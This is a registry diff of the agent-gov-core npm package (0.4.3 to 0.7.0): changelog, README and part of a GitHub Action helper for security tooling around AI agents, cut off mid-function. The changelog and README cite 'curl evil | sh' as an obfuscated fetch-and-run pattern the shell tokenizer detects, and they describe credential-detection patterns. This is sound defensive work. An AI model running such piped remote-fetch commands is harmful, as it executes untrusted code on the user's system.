agent-gov-core 0.4.3 → 0.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/CHANGELOG.md CHANGED
@@ -2,6 +2,107 @@
 
  All notable changes to this project will be documented here. The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). Under v1.0, minor versions may include breaking changes — see [CONTRIBUTING.md](./CONTRIBUTING.md#backwards-compatibility) for the rules.
 
+ ## [0.7.0] — 2026-05-22
+
+ **The pre-v1.0 consolidation release.** Bundles everything that was queued for v0.6.0 (report envelope + merge layer + OTel GenAI interop) plus two shared primitives promoted from consumer repos: `matchSecret` (from PolicyMesh) and `applyExceptions` (unifying PolicyMesh's `subject` and TaskBound's `allow_paths` shapes).
+
+ No breaking changes to the v0.5.0 surface; this is an additive minor bump, and one npm publish covers all of it.
+
+ This is the last release before the v1.0 freeze. The remaining gate is consumer-side: at least one tool has to wire `generateWorkflowSummary` end-to-end. After that comes v1.0, with semver guarantees on the contract pinned by the golden tests.
+
+ ### Added — Report envelope
+ - `Report` interface — canonical multi-tool envelope with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, `findings: Finding[]`, and tool-specific extension `data`.
+ - `Report.conversationId` (optional) — agent session / PR review / thread identifier. Matches OpenTelemetry's `gen_ai.conversation.id` semantic convention so a consumer can pass the same string into both governance reports and OTel traces, then correlate them downstream.
+ - `REPORT_SCHEMA_VERSION` const (`'1.0'`).
+ - `schemas/report.schema.json` — JSON schema for the envelope, exposed via the package's `./schemas/report.schema.json` export.
+ - `createReport({tool, findings, ...})` — convenience constructor; sets `schemaVersion` and computes `rating` from max finding severity (unless overridden).
+ - `maxSeverity(findings)` — helper that returns `'none' | Severity` across a finding list.
+ - `validateReport(value)` — strict envelope check that also validates each contained finding and flags cross-field inconsistencies (e.g. rating below implied max).
+
+ ### Added — Merge layer
+ - `mergeFindings(reports, opts?)` — combine N tool reports into one normalized `MergedReport`:
+   - Deduplicates by `Finding.fingerprint`. The default policy (`highest_severity`) keeps the highest-severity occurrence; `duplicatePolicy: 'first'` keeps the first occurrence.
+   - Optional severity `threshold` drops findings below the requested level and counts them in a `droppedBelowThreshold` field.
+   - Aggregates rating from the surviving findings, not source ratings — so threshold filtering correctly demotes the merged rating.
+   - Sorts findings by severity, highest first.
+   - Propagates `conversationId` to the merged report iff every source agrees. Cross-conversation mixing leaves the field intentionally empty so a meta-reviewer can detect misuse.
+   - **Never silently drops bad data**: malformed envelopes go to `invalidReports[]`, individual malformed findings go to `invalidFindings[]`. A single bad finding in a tool's report doesn't poison the rest of that report.
+ - `MergeOptions`, `MergeSource` (with optional `conversationId`), `MergedReport` (with optional `conversationId`), `InvalidReport`, `InvalidFinding` types.
+
+ ### Added — OpenTelemetry GenAI interop
+ - `docs/INTEROP-OTEL.md` — explicit cross-walk between `agent-gov-core` types and OTel's [`gen_ai.*` semantic conventions](https://opentelemetry.io/docs/specs/semconv/gen-ai/). Maps `Report.conversationId` ↔ `gen_ai.conversation.id`, documents why we adopt one bridge field and not the whole namespace, and shows a paired-emission pattern for orgs running OTel-instrumented agents alongside governance tools.
+
+ ### Added — Hardcoded secret detection (promoted from PolicyMesh)
+ - `matchSecret(value, options?)` — scans a string for provider-prefix credentials and returns `{ provider }` (never the literal credential). Built-in patterns: Anthropic, OpenAI (sk- + sk-proj-), GitHub (PAT + classic), Slack, AWS, Google, GitLab, npm, Docker, Stripe, plus a length-restricted hex token pattern gated to env/header context to avoid commit-SHA false positives.
+ - `MatchSecretOptions.envOrHeaderContext` — opt-in flag for the hex token pattern.
+ - `SECRET_PATTERNS` — exported read-only constant table; golden-tested so additions are non-breaking but removals require a major bump.
+ - `SecretMatch` type.
+ - `env:VAR` references are never flagged (Codex notation for env-var lookups).
+
+ ### Added — Exception baselines (promoted + unified from PolicyMesh + TaskBound)
+ - `applyExceptions(findings, exceptions, now?)` — suppress (or downgrade-on-expiry) findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. PolicyMesh's `.policymesh-exceptions.json` shape and TaskBound's `.taskbound.yml` `ignore_kinds`/`allow_paths` shape both map cleanly onto this unified primitive.
+ - Expired exceptions don't silently drop — they re-surface with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix so stale baselines stay visible. Reason text propagates to `finding.data.exceptionReason`.
+ - `validateException(value)` — runtime check for well-formed exception entries.
+ - `Exception`, `ApplyExceptionsResult` types.
+
+ ### Tests
+ - 57 new cases. 220 total (up from 163). Breakdown:
+   - Report: 17 (schemaVersion pinning, rating derivation, explicit-rating override, validateReport accepting/rejecting envelope-level errors, finding-tool consistency, unknown property rejection, downgrade-allowed/upgrade-flagged rating consistency, conversationId passthrough + type check).
+   - Merge: 14 (empty input, cross-tool combine, fingerprint dedup with `highest_severity` and `first` policies, salientKey-disambiguated findings stay separate, threshold filtering, malformed report → invalidReports, malformed finding → invalidFindings, severity-sorted output, aggregate-rating-reflects-survivors, source provenance, conversationId agreement/disagreement/partial-coverage propagation).
+   - Secrets: 11 (each provider class detected, env: refs never flagged, empty/short input ignored, hex token gated to env/header context, non-hex 40-char string rejected, never-leak-literal contract, golden-pinned `SECRET_PATTERNS` provider set).
+   - Exceptions: 15 (empty input identity, suppress by kind/salientKey/pathPrefix, perpetual-active when no expires, expired surfacing with downgrade/prefix/reason, non-matching kind/salientKey passthrough, pathPrefix without location.file safely non-matches, malformed expires treated as never-expires, future expires stays active, validateException accept/reject paths).
+
+ ## [0.5.0] — 2026-05-22
+
+ Three additive features completing the queue from Gemini's third inspection round, plus a batch of correctness fixes from a deep code-level inspection done before publish. No breaking changes: existing exports and call signatures are unchanged.
+
+ Minor bump (not patch) because the public surface grew; the new top-level exports are listed under Added.
+
+ ### Fixed (pre-publish inspection sweep — Gemini + Cody)
+ - `tokenizeShell` no longer splits on `&` inside file-descriptor redirections (`2>&1`, `>&2`, `<&3`). The single-`&` separator rule now checks the preceding non-whitespace character.
+ - `tokenizeShellDeep` no longer false-positives on `bash -c` text inside double-quoted echo arguments. Previously a whole-string regex matched `bash -c` anywhere, including data being printed. Detection now runs inside the quote-aware walk and only fires at command boundaries outside quoted regions.
+ - `updateMultilineStringState` (TOML locator) now tracks backslash escapes inside basic multi-line strings (`"""…"""`). An escaped `\"""` inside the value no longer prematurely terminates the string-state walker, which had caused decoy keys to match. Literal strings (`'''…'''`) intentionally don't track escapes per TOML spec.
+ - `lineOfTomlKey` now finds dotted keys nested under any prefix table, not just at file root. `[a]\nb.c = 42` is now reachable as `a.b.c`. Same shape as the v0.4.4 top-level fix, generalized.
+ - `lineOfTomlKey` now matches spaced dotted keys (`a . b . c = 1`), which `parseToml` had always accepted but the locator's compact-only regex couldn't find. The pattern is now built from individual segments joined by `\s*\.\s*`.
+ - TOML parser correctly handles a line-ending backslash followed by trailing inline whitespace before the newline. Per spec, `"""line\ \nnext"""` strips the newline and trims leading whitespace on the next line. Previously the trailing spaces caused the backslash to be treated as a regular escape, which kept the text literally instead of throwing but still wasn't spec-compliant.
+ - `normalizeMcpCommand` now treats common boolean long-flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--no-cache`, `--no-color`, `--no-progress`, `--json`, plus short forms `-v -V -q -h -d`) as standalone instead of greedily pairing them with the next positional. Configs with `--verbose pkg` no longer normalize differently depending on flag order.
+ - `normalizeExecutable` (MCP) now lowercases Windows-shaped executable names (those with `\` separators or `.cmd`/`.exe`/`.bat`/`.ps1` suffix) so `NPX.CMD` and `npx` produce identical identity strings. POSIX paths keep their case because `./curl` and `./CURL` are genuinely different files there. The JSDoc had claimed this behavior since v0.1; only now does the implementation match.
+ - `normalizeExecutable` (MCP) also drops the directory portion of paths whose basename matches a known runtime (`node`, `npx`, `python`, `bash`, etc.). `/usr/local/bin/node`, `/usr/bin/node`, `node`, and `C:\Program Files\NodeJS\node.exe` all produce `cmd=node` now. Closes a long-standing PolicyMesh `mcp_command_mismatch` false-positive class across cross-platform team setups. Custom scripts at absolute paths (`/opt/internal/orchestrator.sh`) keep their full path because path is part of their identity.
+ - `generateWorkflowSummary` now HTML-escapes `<`, `>`, and `&` in message cells. A finding message containing `</summary>` or `<h1>` could otherwise break out of the wrapping `<details>` block and manipulate the rendered layout of the GHA step summary page.
+
+ ### Added
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal per shell semantics). Conservative implementation — handles common shapes, not a full shell parser; nesting depth capped at 8.
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. `readJsonObjectWithSource` and `readTomlObject` now wrap their underlying parser errors with this type whenever a byte offset can be recovered. Lets downstream tools emit a `*.config_syntax_error` Finding pointing at the exact spot without recomputing line numbers.
+ - `lineColumnOfOffset(text, offset)` — utility to convert a 0-based byte offset to 1-based `{ line, column }`. Pairs with the new error type.
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks; escapes pipe/newline in message cells; truncates long messages; caps per-severity rows with an overflow indicator. Closes the GHA annotation-cap visibility gap (10 per level, 50 per run silently dropped): every finding is either listed in the workflow summary page or, past the per-severity row cap, counted in that group's overflow line.
+
+ ### Changed
+ - TOML parser semantic errors (`Duplicate key`, `Duplicate key in inline table`, `Duplicate table definition`, `Cannot redefine array-of-tables …`) now include `at offset N` in the message so `readTomlObject` can resolve them to a line.
+
+ ### Tests
+ - 55 new cases. 163 total (up from 108). Coverage:
+   - tokenizeShellDeep: subshells, backticks, `-c` payloads, single-quote literal handling, nested subshells, no-op pass-through, integration with `getCommandHead`. (9 cases)
+   - parse-error: offset → line/column conversion (5 edge cases), structured wrap on JSON and TOML, `parseToml` direct call unchanged, `cause` preservation. (10 cases)
+   - generateWorkflowSummary: empty findings, severity ordering, totals, pipe/newline escape, truncation, per-group cap with overflow, missing location, HTML escape, ampersand escape. (9 cases)
+   - Inspection regressions: 14 cases covering `2>&1`, escaped `\"""`, table-nested dotted keys, line-ending backslash, known-boolean flags, quoted `bash -c` data, Windows case-folding, POSIX case preserved, spaced dotted keys, path de-noise across platforms, custom-script identity preservation.
+   - **Golden compatibility tests** (`test/golden.test.mjs`): 11 cases pinning specific fingerprint hashes and `normalizeMcpCommand` canonical strings. These are the contract — breaking them requires a major bump and migration plan.
+
+ ## [0.4.4] — 2026-05-22
+
+ Cody-led inspection (third reviewer, third round) caught five issues, two of them P0 regressions I introduced in my own v0.4.2 / v0.4.3 fixes. All five fixed here.
+
+ ### Fixed
+ - **P0**: `fingerprintFinding` no longer appends an empty-string segment for findings without `salientKey`. v0.4.3 added `?? ''` which silently changed the hash for every existing finding and broke the v0.4.2 → v0.4.3 backwards-compat claim in my own changelog. Pinned by a new test that asserts the specific v0.4.2-form hash for a salient-less finding.
+ - **P0**: TOML parser no longer rejects valid subtable headers repeated under separate array-of-tables entries. `[[fruits]] [fruits.physical] [[fruits]] [fruits.physical]` now parses correctly — each `[[fruits]]` entry resets the "already defined" status of subtable paths under that AOT. My v0.4.2 `definedTables` guard was global per-file when it should have been scoped to the current AOT entry.
+ - `lineOfJsonStringValue` no longer matches occurrences in key position. Searching for value `"command"` in `{"command":"npx", "args":["command"]}` now returns the array-element line, not the key. Negative lookahead `(?!\s*:)` after the closing quote.
+ - `lineOfTomlKey` now finds top-level dotted keys. `lineOfTomlKey('a.b.c = 1', 'a.b.c')` returns 1 instead of 0 — the dotted-key check was gated behind `inTargetTable` which is false at file root.
+
+ ### Changed
+ - `package-lock.json` resynced to 0.4.4. Was drifting at 0.4.2 because previous releases bumped `package.json` without running `npm install` to refresh the lockfile.
+
+ ### Tests
+ - 6 new cases: pinned v0.4.2-form fingerprint hash, JSON value-vs-key disambiguation (+ colon-in-value sanity check), top-level dotted TOML keys, AOT subtable repeat across entries (+ within-entry duplicate still rejected). 108 total (up from 102).
+
  ## [0.4.3] — 2026-05-22
 
  Third Gemini-inspection round caught one confirmed bug, one disguised-as-suggestion bug, and three feature opportunities. Both bugs fixed here; the feature work is queued for v0.5.0.
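The v0.4.4 fingerprint fix turns on one detail: a finding without `salientKey` must hash exactly as it did before the field existed, so the key is appended only when present rather than defaulted to `''`. A minimal sketch of that rule, assuming a SHA-256 over `|`-joined fields truncated to 16 hex characters. The package's real hash input encoding is not shown in this diff, and `sketchFingerprint` and `SketchFinding` are hypothetical names.

```typescript
import { createHash } from 'node:crypto';

// Hypothetical minimal shape; the package's Finding type has more fields.
interface SketchFinding {
  kind: string;
  location?: { file?: string; line?: number; column?: number };
  salientKey?: string;
}

// Assumption: SHA-256 over '|'-joined fields, first 16 hex chars.
function sketchFingerprint(f: SketchFinding): string {
  const parts: string[] = [
    f.kind,
    f.location?.file ?? '',
    String(f.location?.line ?? ''),
    String(f.location?.column ?? ''),
  ];
  // Append the salient key only when present. Writing `f.salientKey ?? ''`
  // would add a trailing empty segment and change every legacy hash.
  if (f.salientKey !== undefined) parts.push(f.salientKey);
  return createHash('sha256').update(parts.join('|')).digest('hex').slice(0, 16);
}
```

Because `'a|b'` and `'a|b|'` hash differently, the `?? ''` form silently shifts every salient-less fingerprint, which is the regression a pinned v0.4.2-form hash test guards against.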
package/README.md CHANGED
@@ -33,7 +33,7 @@ const finding = createFinding({
  // finding.fingerprint === '<stable 16-char hex>'
  ```
 
- `createFinding` calls `kind()` to build the namespaced kind, validates the slug shape, and computes a stable `fingerprintFinding(finding)` hash of `(kind, file, line, column)`.
+ `createFinding` calls `kind()` to build the namespaced kind, validates the slug shape, and computes a stable `fingerprintFinding(finding)` hash of `(kind, file, line, column, salientKey?)`. Pass `salientKey` when two distinct findings can legitimately fire at the same `(kind, file, line)` site (e.g. two suspicious imports on one line) so the meta-reviewer doesn't collapse them into one.
 
  ### Validate findings from disk
 
@@ -54,6 +54,28 @@ for (const f of report.findings) {
  }
  ```
 
+ ### Merge reports across tools (the meta-reviewer pipeline)
+
+ A cross-tool meta-reviewer ingests JSON reports from N tools, dedupes findings by fingerprint, applies a severity threshold, and rolls up an aggregate rating. The library ships this as `mergeFindings`:
+
+ ```ts
+ import { mergeFindings } from 'agent-gov-core';
+ import { readFileSync } from 'node:fs';
+
+ const reports = [
+   JSON.parse(readFileSync('scopetrail-report.json', 'utf8')),
+   JSON.parse(readFileSync('policymesh-report.json', 'utf8')),
+   JSON.parse(readFileSync('capabilityecho-report.json', 'utf8')),
+ ];
+
+ const merged = mergeFindings(reports, { threshold: 'medium' });
+ console.log(`Merged rating: ${merged.rating}`);
+ console.log(`${merged.findings.length} unique findings across ${merged.sources.length} tools`);
+ console.log(`Dropped ${merged.droppedBelowThreshold} below threshold; collapsed ${merged.duplicateCollapsed} duplicates`);
+ ```
+
+ Malformed reports go to `merged.invalidReports`; malformed individual findings go to `merged.invalidFindings` — neither is silently dropped, so a meta-reviewer can surface what went wrong.
+
  ### Schema is the contract
 
  The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json) is the single source of truth for the dotted-kind shape, the closed `tool` enum, and the location fields. Any tool emitting unprefixed kinds will fail validation. See [CONTRIBUTING.md](./CONTRIBUTING.md#the-finding-schema-is-the-contract) for how the TypeScript types and JSON schema are kept in lockstep.
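The merge rules described in the README section above (dedupe by fingerprint, keep the highest severity by default, count sub-threshold findings instead of losing them, derive the rating from the survivors, sort highest first) fit in a few lines. This is a simplified sketch, not `mergeFindings` itself: `sketchMerge` and the `Mini*` types are hypothetical, it skips envelope validation, `invalidReports`/`invalidFindings`, `duplicatePolicy: 'first'`, and `conversationId` propagation, and it assumes the threshold is applied before deduplication, an order this diff does not document.

```typescript
type Severity = 'low' | 'medium' | 'high' | 'critical';

// Ranks as documented for rankSeverity: low=1, medium=2, high=3, critical=4.
const RANK: Record<Severity, number> = { low: 1, medium: 2, high: 3, critical: 4 };

interface MiniFinding { fingerprint: string; severity: Severity; message: string }

interface MiniMerged {
  findings: MiniFinding[];
  rating: 'none' | Severity;
  droppedBelowThreshold: number;
  duplicateCollapsed: number;
}

function sketchMerge(reports: { findings: MiniFinding[] }[], threshold: Severity = 'low'): MiniMerged {
  const byFingerprint = new Map<string, MiniFinding>();
  let dropped = 0;
  let collapsed = 0;
  for (const report of reports) {
    for (const f of report.findings) {
      // Assumed order: threshold first, so a sub-threshold duplicate counts as dropped.
      if (RANK[f.severity] < RANK[threshold]) { dropped++; continue; }
      const seen = byFingerprint.get(f.fingerprint);
      if (seen === undefined) { byFingerprint.set(f.fingerprint, f); continue; }
      collapsed++;
      // Highest-severity policy: a later duplicate wins only if it is more severe.
      if (RANK[f.severity] > RANK[seen.severity]) byFingerprint.set(f.fingerprint, f);
    }
  }
  const findings = [...byFingerprint.values()].sort((a, b) => RANK[b.severity] - RANK[a.severity]);
  // The rating comes from survivors, so threshold filtering can demote it to 'none'.
  const rating: MiniMerged['rating'] = findings.length === 0 ? 'none' : findings[0].severity;
  return { findings, rating, droppedBelowThreshold: dropped, duplicateCollapsed: collapsed };
}
```

With the opposite order (dedupe first, then threshold), a `low` duplicate of a `medium` finding would be counted as collapsed rather than dropped, so the two counters depend on which order the real implementation uses.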
@@ -69,11 +91,30 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
  - `fingerprintFinding(finding)` — 16-character hex hash of `(kind, file, line, column, salientKey?)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe. Pass `salientKey` (since v0.4.3) when multiple distinct findings can fire at the same site
  - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`
 
+ ### Hardcoded secret detection (since v0.7.0)
+ - `matchSecret(value, options?)` — scans for provider-prefix credentials (Anthropic, OpenAI, GitHub, AWS, Slack, Google, GitLab, npm, Docker, Stripe, plus env/header-gated hex tokens). Returns `{ provider }` — **never the literal credential**. Pass `envOrHeaderContext: true` only when scanning env/header values.
+ - `SECRET_PATTERNS` — read-only constant; the active provider set is pinned by golden tests so additions stay non-breaking.
+
+ ### Exception baselines (since v0.7.0)
+ - `applyExceptions(findings, exceptions, now?)` — suppress findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. Expired exceptions re-surface the finding with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` prefix so stale baselines stay visible.
+ - `validateException(value)` — runtime check for well-formed exception entries loaded from JSON/YAML.
+
+ ### Report envelope and merge (since v0.7.0)
+ - `Report` — canonical multi-tool envelope wrapping a `Finding[]` with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, and tool-specific extension data in `data`
+ - `Report.conversationId` — opt-in session identifier matching OpenTelemetry's [`gen_ai.conversation.id`](https://opentelemetry.io/docs/specs/semconv/gen-ai/) so governance findings and runtime traces can correlate by the same string. See [docs/INTEROP-OTEL.md](./docs/INTEROP-OTEL.md) for the full cross-walk.
+ - `REPORT_SCHEMA_VERSION` — current envelope version (`'1.0'`)
+ - `createReport({tool, findings, ...})` — sets `schemaVersion` and derives `rating` from max finding severity
+ - `maxSeverity(findings)` — returns `'none' | Severity`, used by `createReport`
+ - `validateReport(value)` — strict envelope check including each finding; returns `{ ok, errors[] }`
+ - `mergeFindings(reports, opts?)` — combine N tool reports, dedupe by fingerprint, apply threshold, roll up rating; preserves both invalid envelopes and invalid findings separately so nothing is silently dropped. Propagates `conversationId` to the merged report iff every source agrees on it.
+
  ### Config readers
- - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`; `value` and `json` reference the same parsed object `json` is kept as a deprecated alias.
+ - `readJsonObjectWithSource(path)` — JSONC reader, string-aware comment + trailing-comma stripping, position-preserving. Returns `{ value, json, text, parseError? }`. When the underlying parser provides a byte offset, `parseError` is a `ConfigParseError` carrying `line`/`column`/`rawOffset` instead of a raw `Error`.
  - `stripJsonComments(text)` — same logic exposed for in-memory text
- - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`; `value` and `toml` reference the same parsed object — `toml` is kept as a deprecated alias.
- - `parseToml(text)` — same exposed for text
+ - `readTomlObject(path)` — TOML reader (sections, arrays of tables, inline tables, multi-line strings, dotted/quoted keys). Returns `{ value, toml, text, parseError? }`. As with the JSON reader, `parseError` is a `ConfigParseError` with `line`/`column`/`rawOffset` whenever the position can be resolved.
+ - `parseToml(text)` — same exposed for text; throws raw `Error` (file-level wrapping happens in `readTomlObject`)
+ - `ConfigParseError` — structured parse error with `line`, `column`, `rawOffset`, and `cause`. Lets downstream tools emit a `*.config_syntax_error` finding pointing at the exact spot.
+ - `lineColumnOfOffset(text, offset)` — convert a 0-based byte offset to 1-based `{ line, column }`. Useful when a hand-rolled scanner exposes byte positions and a `Finding.location` needs line/column.
 
  ### Line locators
  - `lineOfJsonKey(text, key, scope?)` — 1-based line of `"key":`, optionally scoped to a byte range
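`lineColumnOfOffset` converts a 0-based offset into the 1-based `{ line, column }` pair a `Finding.location` needs. A minimal sketch of that conversion, assuming the offset is a JavaScript string index (UTF-16 code units) and that only `\n` starts a new line. The library's handling of `\r\n` and multi-byte characters isn't specified in this diff, and `sketchLineColumn` is a hypothetical name.

```typescript
function sketchLineColumn(text: string, offset: number): { line: number; column: number } {
  // Clamp so an out-of-range offset still maps to a position inside the text.
  const end = Math.max(0, Math.min(offset, text.length));
  let line = 1;
  let lineStart = 0;
  for (let i = 0; i < end; i++) {
    if (text[i] === '\n') {
      line++;
      lineStart = i + 1; // the next line begins right after the newline
    }
  }
  return { line, column: end - lineStart + 1 };
}
```

An offset pointing at a `\n` itself reports the last column of that line, not the start of the next one.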
@@ -81,16 +122,23 @@ The JSON schema at [`schemas/finding.schema.json`](./schemas/finding.schema.json
  - `lineOfTomlKey(text, dottedKey, scope?)` — 1-based line of a TOML key, optionally scoped to a byte range. Use scope to disambiguate `[[array]]`-of-tables entries that share the same leaf key.
 
  ### MCP command normalization
- - `normalizeMcpCommand({ command, args, url, env, cwd })` — canonical identity string for an MCP server entry. Drops neutral confirm flags (`-y`, `--yes`), strips Windows executable suffixes (`.cmd`, `.exe`, `.bat`, `.ps1`), sorts non-neutral flags alphabetically, preserves positional argument order, and includes env + cwd in the identity. Used to dedupe `mcp_command_mismatch` false positives when servers are equivalent but syntactically different (`npx -y foo@1.2.3` vs `npx foo@1.2.3`). Does not interpret what npx/uvx invocations resolve to at runtime — that's outside the substrate's scope.
+ - `normalizeMcpCommand({ command, args, url, env, cwd })` — canonical identity string for an MCP server entry. Used to dedupe `mcp_command_mismatch` false positives when servers are equivalent but syntactically different across machines / config files. Does not interpret what npx/uvx invocations resolve to at runtime — that's outside the substrate's scope.
+   - Drops neutral confirm flags (`-y`, `--yes`) so `npx -y foo` and `npx foo` collapse to the same identity.
+   - Strips Windows executable suffixes (`.cmd`, `.exe`, `.bat`, `.ps1`) and case-folds Windows-shaped paths — `NPX.CMD`, `npx.cmd`, and `npx` are all the same executable on Windows.
+   - For known runtimes (`node`, `npx`, `python`, `bash`, etc.), drops the directory portion of absolute paths so `/usr/bin/node`, `/usr/local/bin/node`, and `node` produce identical identity. Custom scripts at absolute paths keep their full path.
+   - Treats common boolean flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--json`, etc.) as standalone instead of greedily pairing them with the next positional argument.
+   - Sorts non-neutral `--key value` flag pairs alphabetically, preserves positional argument order, includes env + cwd in the identity.
 
  ### Shell tokenization
  - `tokenizeShell(command)` — quote-aware split on `;`, `|`, `&&`, `||` plus trivial obfuscation neutralization (`c""url` → `curl`, `c\\url` → `curl`)
+ - `tokenizeShellDeep(command)` — recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal, per shell semantics).
  - `getCommandHead(subcommand)` — extract the leading verb after tokenization
 
  ### GitHub Action helpers
  - `rankSeverity(s)` — numeric rank `low=1, medium=2, high=3, critical=4` (matches the schema's closed severity enum; there is no `none`)
  - `passesSeverityThreshold(s, threshold)`, `anyAtOrAbove(findings, threshold)` — fail-on plumbing
  - `emitFindingAnnotation(f)` — render a Finding as a `::warning file=…,line=…,title=…::…` GitHub workflow annotation
+ - `generateWorkflowSummary(findings, opts?)` — Markdown summary suitable for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks so every finding is either listed or counted in a per-severity overflow row, even when GHA's inline-annotation cap (~10 per level, 50 per run) silently drops the rest
 
  ### Test fixtures (`agent-gov-core/test-utils`)
  Secondary entry point used by consumer test suites. Zero overhead in production — only loaded when test files import it.
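The three executable rules listed under MCP command normalization (case-fold Windows-shaped names, strip Windows suffixes, drop the directory for known runtimes) compose roughly as follows. This is a sketch, not the package's `normalizeExecutable`: `sketchNormalizeExecutable` is hypothetical, the runtime set is an illustrative subset because the README only lists `node`, `npx`, `python`, `bash` "etc.", and the real function's rule order may differ.

```typescript
// Illustrative subset; the real list of known runtimes isn't shown in this diff.
const KNOWN_RUNTIMES = new Set(['node', 'npx', 'python', 'bash']);
const WINDOWS_SUFFIX = /\.(cmd|exe|bat|ps1)$/i;

function sketchNormalizeExecutable(command: string): string {
  const windowsShaped = command.includes('\\') || WINDOWS_SUFFIX.test(command);
  // Windows paths are case-insensitive; POSIX paths keep their case.
  let exe = windowsShaped ? command.toLowerCase() : command;
  exe = exe.replace(WINDOWS_SUFFIX, '');
  // Basename: everything after the last '/' or '\' separator.
  const base = exe.slice(Math.max(exe.lastIndexOf('/'), exe.lastIndexOf('\\')) + 1);
  // Known runtimes lose their directory; custom scripts keep the full path.
  return KNOWN_RUNTIMES.has(base) ? base : exe;
}
```

POSIX case is left alone on purpose: `./curl` and `./CURL` stay distinct, while `NPX.CMD` and `npx` collapse to one identity.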
package/dist/action.d.ts CHANGED
@@ -28,4 +28,34 @@ export declare function anyAtOrAbove(findings: readonly Finding[], threshold: Se
   * // → '::error file=.github/workflows/ci.yml,line=12,title=[capability_echo.workflow_permission_write] high::Workflow grants contents: write to PR-triggered jobs.'
   */
  export declare function emitFindingAnnotation(finding: Finding): string;
+ export interface WorkflowSummaryOptions {
+     /** Top-level heading. Default: `Findings`. */
+     title?: string;
+     /** Cap per severity group; remaining count rendered as `(+N more)`. Default: 100. */
+     perSeverityLimit?: number;
+     /** Truncate message to this many characters (with `…` suffix). Default: 200. */
+     messageMaxLength?: number;
+ }
+ /**
+  * Render a Markdown summary of findings suitable for writing to
+  * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
+  * level, 50 per run) and silently drops the rest; the step summary has no
+  * such cap, so every finding is either listed in the run summary page or,
+  * beyond `perSeverityLimit` rows, counted in its group's overflow row.
+  *
+  * Findings are grouped by severity (critical → high → medium → low) inside
+  * collapsible `<details>` blocks. Each row carries file, line, kind, and a
+  * length-capped message. Cell text has pipes escaped, newlines collapsed to
+  * spaces, and `<`, `>`, `&` HTML-escaped so it can't break the table or the
+  * surrounding `<details>` markup.
+  *
+  * @example
+  * import { generateWorkflowSummary } from 'agent-gov-core';
+  * import { appendFileSync } from 'node:fs';
+  *
+  * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
+  * if (process.env.GITHUB_STEP_SUMMARY) {
+  *     appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
+  * }
+  */
+ export declare function generateWorkflowSummary(findings: readonly Finding[], options?: WorkflowSummaryOptions): string;
  //# sourceMappingURL=action.d.ts.map
package/dist/action.js CHANGED
@@ -76,4 +76,102 @@ function escapeProperty(s) {
76
76
  .replace(/:/g, '%3A')
77
77
  .replace(/,/g, '%2C');
78
78
  }
79
+ /**
80
+ * Render a Markdown summary of findings suitable for writing to
81
+ * `$GITHUB_STEP_SUMMARY`. GitHub Actions caps inline annotations (~10 per
82
+ * level, 50 per run) and silently drops the rest; the step summary has no
83
+ * such cap, so a Markdown table guarantees that 100% of findings are visible
84
+ * in the workflow's run summary page even when annotations are truncated.
85
+ *
86
+ * Findings are grouped by severity (critical → high → medium → low) inside
87
+ * collapsible `<details>` blocks. Each row carries file, line, kind, and a
88
+ * length-capped message. Pipe characters in message text are escaped so they
89
+ * don't break Markdown table rendering.
90
+ *
91
+ * @example
92
+ * import { generateWorkflowSummary } from 'agent-gov-core';
93
+ * import { appendFileSync } from 'node:fs';
94
+ *
95
+ * const md = generateWorkflowSummary(findings, { title: 'CapabilityEcho findings' });
96
+ * if (process.env.GITHUB_STEP_SUMMARY) {
97
+ * appendFileSync(process.env.GITHUB_STEP_SUMMARY, md);
98
+ * }
99
+ */
100
+ export function generateWorkflowSummary(findings, options = {}) {
101
+ const title = options.title ?? 'Findings';
102
+ const perGroupLimit = options.perSeverityLimit ?? 100;
103
+ const messageMax = options.messageMaxLength ?? 200;
104
+ if (findings.length === 0) {
105
+ return `# ${title}\n\nNo findings.\n`;
106
+ }
107
+ const groups = {
108
+ critical: [],
109
+ high: [],
110
+ medium: [],
111
+ low: [],
112
+ };
113
+ for (const f of findings)
114
+ groups[f.severity].push(f);
115
+ const counts = {
116
+ critical: groups.critical.length,
117
+ high: groups.high.length,
118
+ medium: groups.medium.length,
119
+ low: groups.low.length,
120
+ };
121
+ const lines = [];
122
+ lines.push(`# ${title}`, '');
123
+ lines.push(`**Total**: ${findings.length} finding${findings.length === 1 ? '' : 's'} — ` +
124
